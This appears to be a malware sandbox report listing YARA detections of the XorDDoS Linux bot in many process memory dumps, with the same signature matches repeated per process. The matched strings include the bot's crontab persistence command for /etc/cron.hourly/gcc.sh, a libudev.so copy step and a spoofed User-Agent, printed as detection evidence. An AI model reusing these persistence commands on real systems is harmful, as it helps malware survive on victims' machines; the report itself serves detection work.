5691.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5691.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5470.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5470.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5470.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5470.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5530.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5530.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5530.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5530.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5481.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5481.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5481.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5481.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5746.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5746.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5746.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5746.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5620.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5694.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5620.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5620.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5694.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5694.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5620.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5694.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5765.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5765.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5765.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5765.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5623.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5623.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5623.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5623.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5609.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5609.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5609.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5609.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5677.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5677.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5677.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5677.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5461.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5461.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5461.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5461.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5631.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5631.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5631.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5631.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5504.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5504.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5504.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5504.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5648.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5648.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5648.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5648.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5556.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5556.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5556.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5556.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5589.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5589.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5589.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5589.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5576.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5576.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5576.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5576.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5501.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5501.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5501.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5501.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5726.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5726.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5726.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5726.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5666.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5666.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5666.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5666.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5496.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5496.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5496.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5496.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5729.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5729.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5729.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5729.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
